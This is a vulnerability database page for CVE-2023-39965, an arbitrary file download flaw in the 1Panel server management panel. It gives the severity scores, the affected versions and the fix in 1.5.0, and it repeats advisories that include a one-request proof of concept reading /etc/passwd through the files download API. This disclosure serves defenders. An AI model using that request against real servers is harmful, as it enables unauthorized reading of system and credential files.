CVE-2023-39965
published 2023-08-10CVE-2023-39965: 1Panel is an open source Linux server operation and maintenance management panel. In version 1.4.3, authenticated attackers can download arbitrary files…
PriorityP426medium4.3CVSS 3.1
AVNACLPRLUINSUCLINAN
EPSS
0.38%
30.0th percentile
1Panel is an open source Linux server operation and maintenance management panel. In version 1.4.3, authenticated attackers can download arbitrary files through the API interface. This code has unauthorized access. Attackers can freely download the file content on the target system. This may cause a large amount of information leakage. Version 1.5.0 has a patch for this issue.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| 1panel-dev | 1panel | — | — |
| fit2cloud | 1panel | — | — |
| github.com | 1panel-dev_1panel | >= 1.4.3 < 1.5.0 | 1.5.0 |
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
OSV
1Panel Arbitrary File Download vulnerability in github.com/1Panel-dev/1Panel
osv·2024-08-21
CVE-2023-39965 1Panel Arbitrary File Download vulnerability in github.com/1Panel-dev/1Panel
1Panel Arbitrary File Download vulnerability in github.com/1Panel-dev/1Panel
1Panel Arbitrary File Download vulnerability in github.com/1Panel-dev/1Panel
GHSA
1Panel Arbitrary File Download vulnerability
ghsa·2023-08-10
CVE-2023-39965 [MEDIUM] CWE-863 1Panel Arbitrary File Download vulnerability
1Panel Arbitrary File Download vulnerability
### Summary
Any file downloading vulnerability exists in 1Panel backend.
### Details
Authenticated attackers can download arbitrary files through the API interface. This code has unauthorized access.
### PoC
payload:
POST /api/v1/files/download/bypath HTTP/1.1
Host: ip
Content-Type: application/json
{"path":"/etc/passwd"}
### Impact
Attackers can freely download the file content on the target system. This will be caused a large amount of information leakage.
OSV
1Panel Arbitrary File Download vulnerability
osv·2023-08-10
CVE-2023-39965 [MEDIUM] 1Panel Arbitrary File Download vulnerability
1Panel Arbitrary File Download vulnerability
### Summary
Any file downloading vulnerability exists in 1Panel backend.
### Details
Authenticated attackers can download arbitrary files through the API interface. This code has unauthorized access.
### PoC
payload:
POST /api/v1/files/download/bypath HTTP/1.1
Host: ip
Content-Type: application/json
{"path":"/etc/passwd"}
### Impact
Attackers can freely download the file content on the target system. This will be caused a large amount of information leakage.
No detection rules found.
No public exploits indexed.
No writeups or analysis indexed.
2023-08-10
Published